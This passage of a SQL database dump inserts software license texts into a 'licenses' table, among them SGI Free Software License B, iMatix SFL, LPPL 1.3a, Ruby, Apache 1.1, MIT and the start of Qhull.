third\nparty intellectual property claims, for the duration of intellectual property\nprotections inherent in the Original Code, SGI hereby grants Recipient a worldwide,\nroyalty-free, non-exclusive license, to do the following: (i) under copyrights\nLicensable by SGI, to reproduce, distribute, create derivative works from,\nand, to the extent applicable, display and perform the Original Code alone\nand/or as part of a Larger Work; and (ii) under any patent claims Licensable\nby SGI and embodied in the Original Code, to make, have made, use, practice,\nsell, and offer for sale, and/or otherwise dispose of the Original Code. Recipient\naccepts the terms and conditions of this License by undertaking any of the\naforementioned actions.\n\n2.2 Restriction on Patent License. Notwithstanding the provisions of Section\n2.1(ii), no patent license is granted: 1) separate from the Original Code;\nnor 2) for infringements caused by (i) modification of the Original Code,\nor (ii) the combination of the Original Code with other software or Hardware.\n\n2.3 No License For Hardware Implementations. The licenses granted in Section\n2.1 are not applicable to implementation in Hardware of the algorithms embodied\nin the Original Code.\n\n2.4 Modifications License and API Compliance. Modifications are only licensed\nunder Section 2.1(i) to the extent such Modifications are fully compliant\nwith any API as may be identified in Additional Notice Provisions as appear\nin the Original Code.\n\n 3. Redistributions.\n\nA. Retention of Notice/Copy of License. The Notice set forth in Exhibit A,\nbelow, must be conspicuously retained or included in any and all redistributions\nof Covered Code. For distributions of the Covered Code in source code form,\nthe Notice must appear in every file that can include a text comments field;\nin executable form, the Notice and a copy of this License must appear in related\ndocumentation or collateral where the Recipient\'s rights relating to Covered\nCode are described. Any Additional Notice Provisions which actually appears\nin the Original Code must also be retained or included in any and all redistributions\nof Covered Code.\n\nB. Alternative License. Provided that Recipient is in compliance with the\nterms of this License, Recipient may distribute the source code and/or executable\nversion(s) of Covered Code under (1) this License; (2) a license identical\nto this License but for only such changes as are necessary in order to clarify\nRecipient\'s role as licensor of Modifications, without derogation of any of\nSGI\'s rights; and/or (3) a license of Recipient\'s choosing, containing terms\ndifferent from this License, provided that the license terms include this\nSection 3 and Sections 4, 6, 7, 10, 12, and 13, which terms may not be modified\nor superseded by any other terms of such license. If Recipient elects to use\nany license other than this License, Recipient must make it absolutely clear\nthat any of its terms which differ from this License are offered by Recipient\nalone, and not by SGI.\n\nC. Indemnity. Recipient hereby agrees to indemnify SGI for any liability incurred\nby SGI as a result of any such alternative license terms Recipient offers.\n\n4. Termination. This License and the rights granted hereunder will terminate\nautomatically if Recipient breaches any term herein and fails to cure such\nbreach within 30 days thereof. Any sublicense to the Covered Code that is\nproperly granted shall survive any termination of this License, absent termination\nby the terms of such sublicense. Provisions that, by their nature, must remain\nin effect beyond the termination of this License, shall survive.\n\n5. No Trademark Or Other Rights. This License does not grant any rights to:\n(i) any software apart from the Covered Code, nor shall any other rights or\nlicenses not expressly granted hereunder arise by implication, estoppel or\notherwise with respect to the Covered Code; (ii) any trade name, trademark\nor service mark whatsoever, including without limitation any related right\nfor purposes of endorsement or promotion of products derived from the Covered\nCode, without prior written permission of SGI; or (iii) any title to or ownership\nof the Original Code, which shall at all times remains with SGI. All rights\nin the Original Code not expressly granted under this License are reserved.\n\n6. Compliance with Laws; Non-Infringement. Recipient hereby assures that it\nshall comply with all applicable laws, regulations, and executive orders,\nin connection with any and all dispositions of Covered Code, including but\nnot limited to, all export, re-export, and import control laws, regulations,\nand executive orders, of the U.S. government and other countries. Recipient\nmay not distribute Covered Code that (i) in any way infringes (directly or\ncontributorily) the rights (including patent, copyright, trade secret, trademark\nor other intellectual property rights of any kind) of any other person or\nentity or (ii) breaches any representation or warranty, express, implied or\nstatutory, to which, under any applicable law, it might be deemed to have\nbeen subject.\n\n7. Claims of Infringement. If Recipient learns of any third party claim that\nany disposition of Covered Code and/or functionality wholly or partially infringes\nthe third party\'s intellectual property rights, Recipient will promptly notify\nSGI of such claim.\n\n8. Versions of the License. SGI may publish revised and/or new versions of\nthe License from time to time, each with a distinguishing version number.\nOnce Covered Code has been published under a particular version of the License,\nRecipient may, for the duration of the license, continue to use it under the\nterms of that version, or choose to use such Covered Code under the terms\nof any subsequent version published by SGI. Subject to the provisions of Sections\n3 and 4 of this License, only SGI may modify the terms applicable to Covered\nCode created under this License.\n\n9. DISCLAIMER OF WARRANTY. COVERED CODE IS PROVIDED \"AS IS.\" ALL EXPRESS AND\nIMPLIED WARRANTIES AND CONDITIONS ARE DISCLAIMED, INCLUDING, WITHOUT LIMITATION,\nANY IMPLIED WARRANTIES AND CONDITIONS OF MERCHANTABILITY, SATISFACTORY QUALITY,\nFITNESS FOR A PARTICULAR PURPOSE, AND NON-INFRINGEMENT. SGI ASSUMES NO RISK\nAS TO THE QUALITY AND PERFORMANCE OF THE SOFTWARE. SHOULD THE SOFTWARE PROVE\nDEFECTIVE IN ANY RESPECT, SGI ASSUMES NO COST OR LIABILITY FOR SERVICING,\nREPAIR OR CORRECTION. THIS DISCLAIMER OF WARRANTY IS AN ESSENTIAL PART OF\nTHIS LICENSE. NO USE OF ANY COVERED CODE IS AUTHORIZED HEREUNDER EXCEPT SUBJECT\nTO THIS DISCLAIMER.\n\n10. LIMITATION OF LIABILITY. UNDER NO CIRCUMSTANCES NOR LEGAL THEORY, WHETHER\nTORT (INCLUDING, WITHOUT LIMITATION, NEGLIGENCE OR STRICT LIABILITY), CONTRACT,\nOR OTHERWISE, SHALL SGI OR ANY SGI LICENSOR BE LIABLE FOR ANY DIRECT, INDIRECT,\nSPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES OF ANY CHARACTER INCLUDING,\nWITHOUT LIMITATION, DAMAGES FOR LOSS OF GOODWILL, WORK STOPPAGE, LOSS OF DATA,\nCOMPUTER FAILURE OR MALFUNCTION, OR ANY AND ALL OTHER COMMERCIAL DAMAGES OR\nLOSSES, EVEN IF SUCH PARTY SHALL HAVE BEEN INFORMED OF THE POSSIBILITY OF\nSUCH DAMAGES. THIS LIMITATION OF LIABILITY SHALL NOT APPLY TO LIABILITY FOR\nDEATH OR PERSONAL INJURY RESULTING FROM SGI\'s NEGLIGENCE TO THE EXTENT APPLICABLE\nLAW PROHIBITS SUCH LIMITATION. SOME JURISDICTIONS DO NOT ALLOW THE EXCLUSION\nOR LIMITATION OF INCIDENTAL OR CONSEQUENTIAL DAMAGES, SO THAT EXCLUSION AND\nLIMITATION MAY NOT APPLY TO RECIPIENT.\n\n11. Indemnity. Recipient shall be solely responsible for damages arising,\ndirectly or indirectly, out of its utilization of rights under this License.\nRecipient will defend, indemnify and hold harmless Silicon Graphics, Inc.\nfrom and against any loss, liability, damages, costs or expenses (including\nthe payment of reasonable attorneys fees) arising out of Recipient\'s use,\nmodification, reproduction and distribution of the Covered Code or out of\nany representation or warranty made by Recipient.\n\n12. U.S. Government End Users. The Covered Code is a \"commercial item\" consisting\nof \"commercial computer software\" as such terms are defined in title 48 of\nthe Code of Federal Regulations and all U.S. Government End Users acquire\nonly the rights set forth in this License and are subject to the terms of\nthis License.\n\n13. Miscellaneous. This License represents the complete agreement concerning\nthe its subject matter. If any provision of this License is held to be unenforceable,\nsuch provision shall be reformed so as to achieve as nearly as possible the\nsame legal and economic effect as the original provision and the remainder\nof this License will remain in effect. This License shall be governed by and\nconstrued in accordance with the laws of the United States and the State of\nCalifornia as applied to agreements entered into and to be performed entirely\nwithin California between California residents. Any litigation relating to\nthis License shall be subject to the exclusive jurisdiction of the Federal\nCourts of the Northern District of California (or, absent subject matter jurisdiction\nin such courts, the courts of the State of California), with venue lying exclusively\nin Santa Clara County, California, with the losing party responsible for costs,\nincluding without limitation, court costs and reasonable attorneys fees and\nexpenses. The application of the United Nations Convention on Contracts for\nthe International Sale of Goods is expressly excluded. Any law or regulation\nwhich provides that the language of a contract shall be construed against\nthe drafter shall not apply to this License. Exhibit A\n\nLicense Applicability. Except to the extent portions of this file are made\nsubject to an alternative license as permitted in the SGI Free Software License\nB, Version 1.0 (the \"License\"), the contents of this file are subject only\nto the provisions of the License. You may not use this file except in compliance\nwith the License. You may obtain a copy of the License at Silicon Graphics,\nInc., attn: Legal Services, 1600 Ampitheatre Parkway, Mountain View, CA 94043-1351,\nor at:\n\nhttp://oss.sgi.com/projects/FreeB\n\nNote that, as provided in the License, the Software is distributed on an \"AS\nIS\" basis, with ALL EXPRESS AND IMPLIED WARRANTIES AND CONDITIONS DISCLAIMED,\nINCLUDING, WITHOUT LIMITATION, ANY IMPLIED WARRANTIES AND CONDITIONS OF MERCHANTABILITY,\nSATISFACTORY QUALITY, FITNESS FOR A PARTICULAR PURPOSE, AND NON-INFRINGEMENT.\n\nOriginal Code. The Original Code is: [ name of software , version number ,\nand release date ] , developed by Silicon Graphics, Inc. The Original Code\nis Copyright (c) [ dates of first publication, as appearing in the Notice\nin the Original Code ] Silicon Graphics, Inc. Copyright in any portions created\nby third parties is as indicated elsewhere herein. All Rights Reserved.\n\nAdditional Notice Provisions: [ such additional provisions, if any, as appear\nin the Notice in the Original Code under the heading \"Additional Notice Provisions\"\n]\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0);
|
||
INSERT INTO `licenses` VALUES (124,'iMatix','The SFL License Agreement\n\nThis license agreement covers your use of the iMatix STANDARD FUNCTION LIBRARY\n(SFL), its source code, documentation, and executable files, hereinafter referred\nto as \"the Product\".\n\nThe Product is Copyright (c) 1991-2000 iMatix Corporation. You may use it\nand distribute it according to this following License Agreement. If you do\nnot agree with these terms, please remove the Product from your system. By\nincorporating the Product in your work or distributing the Product to others\nyou implicitly agree to these license terms.\n\nStatement Of Copyright\n\nThe Product is, and remains, Copyright © 1991-2000 iMatix Corporation, with\nexception of specific copyrights as noted in the individual source files.\n\nConditions Of Use\n\nYou do not need to provide the source code for the Product as part of your\nproduct. However, you must do one of these things to comply with the Product\nLicense Agreement:\n\n 1. Provide the source code for Product modules that you use, or\n\n2. Make your product freely available according to a license similar to the\nGNU General Public License, or the Perl Artistic License, or\n\n3. Add this phrase to the documentation for your product: \"This product uses\nparts of the iMatix SFL, Copyright © 1991-2000 iMatix Corporation <http://www.imatix.com>\".\n\nRights Of Usage\n\nYou may freely and at no cost use the Product in any project, commercial,\nacademic, military, or private, so long as you respect the License Agreement.\nThe License Agreement does not affect any software except the Product. In\nparticular, any application that uses the Product does not itself fall under\nthe License Agreement.\n\nYou may modify any part of the Product, including sources and documentation,\nexcept this License Agreement, which you may not modify.\n\nYou must clearly indicate any modifications at the start of each source file.\nThe user of any modified Product code must know that the source file is not\noriginal.\n\n \n\nAt your discretion, you may rewrite or reuse any part of the Product so that\nyour derived code is not obviously part of the Product. This derived code\ndoes not fall under the Product License Agreement directly, but you must include\na credit at the start of each source file indicating the original authorship\nand source of the code, and a statement of copyright as follows:\n\n \"Parts copyright (c) 1991-2000 iMatix Corporation.\"\n\nRights Of Distribution\n\nYou may freely distribute the Product, or any subset of the Product, by any\nmeans. The License, in the form of the file called \"LICENSE.TXT\" must accompany\nany such distribution.\n\nYou may charge a fee for distributing the Product, for providing a warranty\non the Product, for making modifications to the Product, or for any other\nservice provided in relation to the Product. You are not required to ask our\npermission for any of these activities.\n\nAt no time will iMatix associate itself with any distribution of the Product\nexcept that supplied from the Internet site http://www.imatix.com.\n\nDisclaimer Of Warranty\n\nThe Product is provided as free software, in the hope that it will be useful.\nIt is provided \"as-is\", without warranty of any kind, either expressed or\nimplied, including, but not limited to, the implied warranties of merchantability\nand fitness for a particular purpose. The entire risk as to the quality and\nperformance of the Product is with you. Should the Product prove defective,\nthe full cost of repair, servicing, or correction lies with you.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(125,'LPPL-1.3a','The LaTeX Project Public License\n\n=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n\nLPPL Version 1.3a 2004-10-01\n\nCopyright 1999 2002-04 LaTeX3 Project\n\nEveryone is allowed to distribute verbatim copies of this license document,\nbut modification of it is not allowed.\n\nPREAMBLE\n\n========\n\nThe LaTeX Project Public License (LPPL) is the primary license under which\nthe the LaTeX kernel and the base LaTeX packages are distributed.\n\nYou may use this license for any work of which you hold the copyright and\nwhich you wish to distribute. This license may be particularly suitable if\nyour work is TeX-related (such as a LaTeX package), but you may use it with\nsmall modifications even if your work is unrelated to TeX.\n\nThe section `WHETHER AND HOW TO DISTRIBUTE WORKS UNDER THIS LICENSE\', below,\ngives instructions, examples, and recommendations for authors who are considering\ndistributing their works under this license.\n\nThis license gives conditions under which a work may be distributed and modified,\nas well as conditions under which modified versions of that work may be distributed.\n\nWe, the LaTeX3 Project, believe that the conditions below give you the freedom\nto make and distribute modified versions of your work that conform with whatever\ntechnical specifications you wish while maintaining the availability, integrity,\nand reliability of that work. If you do not see how to achieve your goal while\nmeeting these conditions, then read the document `cfgguide.tex\' and `modguide.tex\'\nin the base LaTeX distribution for suggestions.\n\nDEFINITIONS\n\n===========\n\nIn this license document the following terms are used:\n\n`Work\' Any work being distributed under this License. `Derived Work\' Any work\nthat under any applicable law is derived from the Work.\n\n`Modification\' Any procedure that produces a Derived Work under any applicable\nlaw -- for example, the production of a file containing an original file associated\nwith the Work or a significant portion of such a file, either verbatim or\nwith modifications and/or translated into another language.\n\n`Modify\' To apply any procedure that produces a Derived Work under any applicable\nlaw. `Distribution\' Making copies of the Work available from one person to\nanother, in whole or in part. Distribution includes (but is not limited to)\nmaking any electronic components of the Work accessible by file transfer protocols\nsuch as FTP or HTTP or by shared file systems such as Sun\'s Network File System\n(NFS).\n\n`Compiled Work\' A version of the Work that has been processed into a form\nwhere it is directly usable on a computer system. This processing may include\nusing installation facilities provided by the Work, transformations of the\nWork, copying of components of the Work, or other activities. Note that modification\nof any installation facilities provided by the Work constitutes modification\nof the Work.\n\n`Current Maintainer\' A person or persons nominated as such within the Work.\nIf there is no such explicit nomination then it is the `Copyright Holder\'\nunder any applicable law.\n\n`Base Interpreter\' A program or process that is normally needed for running\nor interpreting a part or the whole of the Work. A Base Interpreter may depend\non external components but these are not considered part of the Base Interpreter\nprovided that each external component clearly identifies itself whenever it\nis used interactively. Unless explicitly specified when applying the license\nto the Work, the only applicable Base Interpreter is a \"LaTeX-Format\".\n\nCONDITIONS ON DISTRIBUTION AND MODIFICATION\n\n===========================================\n\n1. Activities other than distribution and/or modification of the Work are\nnot covered by this license; they are outside its scope. In particular, the\nact of running the Work is not restricted and no requirements are made concerning\nany offers of support for the Work.\n\n2. You may distribute a complete, unmodified copy of the Work as you received\nit. Distribution of only part of the Work is considered modification of the\nWork, and no right to distribute such a Derived Work may be assumed under\nthe terms of this clause.\n\n3. You may distribute a Compiled Work that has been generated from a complete,\nunmodified copy of the Work as distributed under Clause 2 above, as long as\nthat Compiled Work is distributed in such a way that the recipients may install\nthe Compiled Work on their system exactly as it would have been installed\nif they generated a Compiled Work directly from the Work.\n\n4. If you are the Current Maintainer of the Work, you may, without restriction,\nmodify the Work, thus creating a Derived Work. You may also distribute the\nDerived Work without restriction, including Compiled Works generated from\nthe Derived Work. Derived Works distributed in this manner by the Current\nMaintainer are considered to be updated versions of the Work.\n\n5. If you are not the Current Maintainer of the Work, you may modify your\ncopy of the Work, thus creating a Derived Work based on the Work, and compile\nthis Derived Work, thus creating a Compiled Work based on the Derived Work.\n\n6. If you are not the Current Maintainer of the Work, you may distribute a\nDerived Work provided the following conditions are met for every component\nof the Work unless that component clearly states in the copyright notice that\nit is exempt from that condition. Only the Current Maintainer is allowed to\nadd such statements of exemption to a component of the Work.\n\na. If a component of this Derived Work can be a direct replacement for a component\nof the Work when that component is used with the Base Interpreter, then, wherever\nthis component of the Work identifies itself to the user when used interactively\nwith that Base Interpreter, the replacement component of this Derived Work\nclearly and unambiguously identifies itself as a modified version of this\ncomponent to the user when used interactively with that Base Interpreter.\n\nb. Every component of the Derived Work contains prominent notices detailing\nthe nature of the changes to that component, or a prominent reference to another\nfile that is distributed as part of the Derived Work and that contains a complete\nand accurate log of the changes.\n\nc. No information in the Derived Work implies that any persons, including\n(but not limited to) the authors of the original version of the Work, provide\nany support, including (but not limited to) the reporting and handling of\nerrors, to recipients of the Derived Work unless those persons have stated\nexplicitly that they do provide such support for the Derived Work.\n\n d. You distribute at least one of the following with the Derived Work:\n\n1. A complete, unmodified copy of the Work; if your distribution of a modified\ncomponent is made by offering access to copy the modified component from a\ndesignated place, then offering equivalent access to copy the Work from the\nsame or some similar place meets this condition, even though third parties\nare not compelled to copy the Work along with the modified component;\n\n2. Information that is sufficient to obtain a complete, unmodified copy of\nthe Work.\n\n7. If you are not the Current Maintainer of the Work, you may distribute a\nCompiled Work generated from a Derived Work, as long as the Derived Work is\ndistributed to all recipients of the Compiled Work, and as long as the conditions\nof Clause 6, above, are met with regard to the Derived Work.\n\n8. The conditions above are not intended to prohibit, and hence do not apply\nto, the modification, by any method, of any component so that it becomes identical\nto an updated version of that component of the Work as it is distributed by\nthe Current Maintainer under Clause 4, above.\n\n9. Distribution of the Work or any Derived Work in an alternative format,\nwhere the Work or that Derived Work (in whole or in part) is then produced\nby applying some process to that format, does not relax or nullify any sections\nof this license as they pertain to the results of applying that process.\n\n 10.\n\na. A Derived Work may be distributed under a different license provided that\nlicense itself honors the conditions listed in Clause 6 above, in regard to\nthe Work, though it does not have to honor the rest of the conditions in this\nlicense.\n\nb. If a Derived Work is distributed under this license, that Derived Work\nmust provide sufficient documentation as part of itself to allow each recipient\nof that Derived Work to honor the restrictions in Clause 6 above, concerning\nchanges from the Work.\n\n11. This license places no restrictions on works that are unrelated to the\nWork, nor does this license place any restrictions on aggregating such works\nwith the Work by any means.\n\n12. Nothing in this license is intended to, or may be used to, prevent complete\ncompliance by all parties with all applicable laws.\n\nNO WARRANTY\n\n===========\n\nThere is no warranty for the Work. Except when otherwise stated in writing,\nthe Copyright Holder provides the Work `as is\', without warranty of any kind,\neither expressed or implied, including, but not limited to, the implied warranties\nof merchantability and fitness for a particular purpose. The entire risk as\nto the quality and performance of the Work is with you. Should the Work prove\ndefective, you assume the cost of all necessary servicing, repair, or correction.\n\nIn no event unless required by applicable law or agreed to in writing will\nThe Copyright Holder, or any author named in the components of the Work, or\nany other party who may distribute and/or modify the Work as permitted above,\nbe liable to you for damages, including any general, special, incidental or\nconsequential damages arising out of any use of the Work or out of inability\nto use the Work (including, but not limited to, loss of data, data being rendered\ninaccurate, or losses sustained by anyone as a result of any failure of the\nWork to operate with any other programs), even if the Copyright Holder or\nsaid author or said other party has been advised of the possibility of such\ndamages.\n\nMAINTENANCE OF THE WORK\n\n=======================\n\nThe Work has the status `author-maintained\' if the Copyright Holder explicitly\nand prominently states near the primary copyright notice in the Work that\nthe Work can only be maintained by the Copyright Holder or simply that is\n`author-maintained\'.\n\nThe Work has the status `maintained\' if there is a Current Maintainer who\nhas indicated in the Work that they are willing to receive error reports for\nthe Work (for example, by supplying a valid e-mail address). It is not required\nfor the Current Maintainer to acknowledge or act upon these error reports.\n\nThe Work changes from status `maintained\' to `unmaintained\' if there is no\nCurrent Maintainer, or the person stated to be Current Maintainer of the work\ncannot be reached through the indicated means of communication for a period\nof six months, and there are no other significant signs of active maintenance.\n\nYou can become the Current Maintainer of the Work by agreement with any existing\nCurrent Maintainer to take over this role.\n\nIf the Work is unmaintained, you can become the Current Maintainer of the\nWork through the following steps:\n\n1. Make a reasonable attempt to trace the Current Maintainer (and the Copyright\nHolder, if the two differ) through the means of an Internet or similar search.\n\n2. If this search is successful, then enquire whether the Work is still maintained.\n\na. If it is being maintained, then ask the Current Maintainer to update their\ncommunication data within one month.\n\nb. If the search is unsuccessful or no action to resume active maintenance\nis taken by the Current Maintainer, then announce within the pertinent community\nyour intention to take over maintenance. (If the Work is a LaTeX work, this\ncould be done, for example, by posting to comp.text.tex.)\n\n3a. If the Current Maintainer is reachable and agrees to pass maintenance\nof the Work to you, then this takes effect immediately upon announcement.\n\nb. If the Current Maintainer is not reachable and the Copyright Holder agrees\nthat maintenance of the Work be passed to you, then this takes effect immediately\nupon announcement.\n\n4. If you make an `intention announcement\' as described in 2b. above and after\nthree months your intention is challenged neither by the Current Maintainer\nnor by the Copyright Holder nor by other people, then you may arrange for\nthe Work to be changed so as to name you as the (new) Current Maintainer.\n\n5. If the previously unreachable Current Maintainer becomes reachable once\nmore within three months of a change completed under the terms of 3b) or 4),\nthen that Current Maintainer must become or remain the Current Maintainer\nupon request provided they then update their communication data within one\nmonth.\n\nA change in the Current Maintainer does not, of itself, alter the fact that\nthe Work is distributed under the LPPL license.\n\nIf you become the Current Maintainer of the Work, you should immediately provide,\nwithin the Work, a prominent and unambiguous statement of your status as Current\nMaintainer. You should also announce your new status to the same pertinent\ncommunity as in 2b) above.\n\nWHETHER AND HOW TO DISTRIBUTE WORKS UNDER THIS LICENSE\n\n======================================================\n\nThis section contains important instructions, examples, and recommendations\nfor authors who are considering distributing their works under this license.\nThese authors are addressed as `you\' in this section.\n\nChoosing This License or Another License\n\n----------------------------------------\n\nIf for any part of your work you want or need to use *distribution* conditions\nthat differ significantly from those in this license, then do not refer to\nthis license anywhere in your work but, instead, distribute your work under\na different license. You may use the text of this license as a model for your\nown license, but your license should not refer to the LPPL or otherwise give\nthe impression that your work is distributed under the LPPL.\n\nThe document `modguide.tex\' in the base LaTeX distribution explains the motivation\nbehind the conditions of this license. It explains, for example, why distributing\nLaTeX under the GNU General Public License (GPL) was considered inappropriate.\nEven if your work is unrelated to LaTeX, the discussion in `modguide.tex\'\nmay still be relevant, and authors intending to distribute their works under\nany license are encouraged to read it.\n\nA Recommendation on Modification Without Distribution\n\n-----------------------------------------------------\n\nIt is wise never to modify a component of the Work, even for your own personal\nuse, without also meeting the above conditions for distributing the modified\ncomponent. While you might intend that such modifications will never be distributed,\noften this will happen by accident -- you may forget that you have modified\nthat component; or it may not occur to you when allowing others to access\nthe modified version that you are thus distributing it and violating the conditions\nof this license in ways that could have legal implications and, worse, cause\nproblems for the community. It is therefore usually in your best interest\nto keep your copy of the Work identical with the public one. Many works provide\nways to control the behavior of that work without altering any of its licensed\ncomponents.\n\nHow to Use This License\n\n-----------------------\n\nTo use this license, place in each of the components of your work both an\nexplicit copyright notice including your name and the year the work was authored\nand/or last substantially modified. Include also a statement that the distribution\nand/or modification of that component is constrained by the conditions in\nthis license.\n\nHere is an example of such a notice and statement:\n\n%% pig.dtx\n\n%% Copyright 2003 M. Y. Name\n\n%\n\n% This work may be distributed and/or modified under the\n\n% conditions of the LaTeX Project Public License, either version 1.3\n\n% of this license or (at your option) any later version.\n\n% The latest version of this license is in\n\n% http://www.latex-project.org/lppl.txt\n\n% and version 1.3 or later is part of all distributions of LaTeX\n\n% version 2003/12/01 or later.\n\n%\n\n% This work has the LPPL maintenance status \" maintained \".\n\n%\n\n% This Current Maintainer of this work is M. Y. Name .\n\n%\n\n% This work consists of the files pig.dtx and pig.ins\n\n% and the derived file pig.sty .\n\nGiven such a notice and statement in a file, the conditions given in this\nlicense document would apply, with the `Work\' referring to the three files\n`pig.dtx\', `pig.ins\', and `pig.sty\' (the last being generated from `pig.dtx\'\nusing `pig.ins\'), the `Base Interpreter\' referring to any \"LaTeX-Format\",\nand both `Copyright Holder\' and `Current Maintainer\' referring to the person\n`M. Y. Name\'.\n\nIf you do not want the Maintenance section of LPPL to apply to your Work,\nchange \"maintained\" above into \"author-maintained\". However, we recommend\nthat you use \"maintained\" as the Maintenance section was added in order to\nensure that your Work remains useful to the community even when you can no\nlonger maintain and support it yourself.\n\nImportant Recommendations\n\n-------------------------\n\nDefining What Constitutes the Work\n\nThe LPPL requires that distributions of the Work contain all the files of\nthe Work. It is therefore important that you provide a way for the licensee\nto determine which files constitute the Work. This could, for example, be\nachieved by explicitly listing all the files of the Work near the copyright\nnotice of each file or by using a line such as:\n\n% This work consists of all files listed in manifest.txt.\n\nin that place. In the absence of an unequivocal list it might be impossible\nfor the licensee to determine what is considered by you to comprise the Work\nand, in such a case, the licensee would be entitled to make reasonable conjectures\nas to which files comprise the Work.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(126,'Ruby','\n\n1. You may make and give away verbatim copies of the source form of the software\nwithout restriction, provided that you duplicate all of the original copyright\nnotices and associated disclaimers.\n\n2. You may modify your copy of the software in any way, provided that you\ndo at least ONE of the following:\n\na) place your modifications in the Public Domain or otherwise make them Freely\nAvailable, such as by posting said modifications to Usenet or an equivalent\nmedium, or by allowing the author to include your modifications in the software.\n\n b) use the modified software only within your corporation or organization.\n\nc) give non-standard binaries non-standard names, with instructions on where\nto get the original software distribution.\n\n d) make other distribution arrangements with the author.\n\n3. You may distribute the software in object code or binary form, provided\nthat you do at least ONE of the following:\n\na) distribute the binaries and library files of the software, together with\ninstructions (in the manual page or equivalent) on where to get the original\ndistribution.\n\nb) accompany the distribution with the machine-readable source of the software.\n\nc) give non-standard binaries non-standard names, with instructions on where\nto get the original software distribution.\n\n d) make other distribution arrangements with the author.\n\n4. You may modify and include the part of the software into any other software\n(possibly commercial). But some files in the distribution are not written\nby the author, so that they are not under these terms.\n\nFor the list of those files and their copying conditions, see the file LEGAL.\n\n5. The scripts and library files supplied as input to or produced as output\nfrom the software do not automatically fall under the copyright of the software,\nbut belong to whomever generated them, and may be sold commercially, and may\nbe aggregated with this software.\n\n6. THIS SOFTWARE IS PROVIDED \"AS IS\" AND WITHOUT ANY EXPRESS OR IMPLIED WARRANTIES,\nINCLUDING, WITHOUT LIMITATION, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND\nFITNESS FOR A PARTICULAR PURPOSE.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(127,'Apache-1.1','Apache License 1.1\n\nCopyright (c) 2000 The Apache Software Foundation . All rights reserved.\n\nRedistribution and use in source and binary forms, with or without modification,\nare permitted provided that the following conditions are met:\n\n1. Redistributions of source code must retain the above copyright notice,\nthis list of conditions and the following disclaimer.\n\n2. Redistributions in binary form must reproduce the above copyright notice,\nthis list of conditions and the following disclaimer in the documentation\nand/or other materials provided with the distribution.\n\n3. The end-user documentation included with the redistribution, if any, must\ninclude the following acknowledgment:\n\n\"This product includes software developed by the Apache Software Foundation\n(http://www.apache.org/) .\"\n\nAlternately, this acknowledgment may appear in the software itself, if and\nwherever such third-party acknowledgments normally appear.\n\n4. The name \"Apache\" and \"Apache Software Foundation\" must not be used to\nendorse or promote products derived from this software without prior written\npermission. For written permission, please contact apache@apache.org .\n\n5. Products derived from this software may not be called \"Apache\" [ex. \"Jakarta,\"\n\"Apache,\" or \"Apache Commons,\"] nor may \"Apache\" [ex. the names] appear in\ntheir name, without prior written permission of the Apache Software Foundation\n.\n\nTHIS SOFTWARE IS PROVIDED \'\'AS IS\'\' AND ANY EXPRESSED OR IMPLIED WARRANTIES,\nINCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND\nFITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE APACHE\nSOFTWARE FOUNDATION OR ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,\nINCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\nLIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA,\nOR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF\nLIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\nOR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF\nADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\nThis software consists of voluntary contributions made by many individuals\non behalf of the Apache Software Foundation. For more information on the Apache\nSoftware Foundation, please see http://www.apache.org/. Portions of this software\nare based upon public domain software originally written at the National Center\nfor Supercomputing Applications, University of Illinois, Urbana-Champaign.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(128,'Barr','This is a package of commutative diagram macros built on top of Xy-pic by\nMichael Barr (email: barr@barrs.org). Its use is unrestricted. It may be freely\ndistributed, unchanged, for non-commercial or commercial use. If changed,\nit must be renamed. Inclusion in a commercial software package is also permitted,\nbut I would appreciate receiving a free copy for my personal examination and\nuse. There are no guarantees that this package is good for anything. I have\ntested it with LaTeX 2e, LaTeX 2.09 and Plain TeX. Although I know of no reason\nit will not work with AMSTeX, I have not tested it.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(129,'MIT','MIT License\n\nCopyright (c) <year> <copyright holders>\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is furnished\nto do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice (including the next\nparagraph) shall be included in all copies or substantial portions of the\nSoftware.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS\nFOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS\nOR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,\nWHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF\nOR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(130,'Qhull','Qhull, Copyright (c) 1993-2003\n\nThe National Science and Technology Research Center for Computation and Visualization\nof Geometric Structures (The Geometry Center) University of Minnesota\n\nemail: qhull@qhull.org\n\nThis software includes Qhull from The Geometry Center. Qhull is copyrighted\nas noted above. Qhull is free software and may be obtained via http from www.qhull.org.\nIt may be freely copied, modified, and redistributed under the following conditions:\n\n 1. All copyright notices must remain intact in all 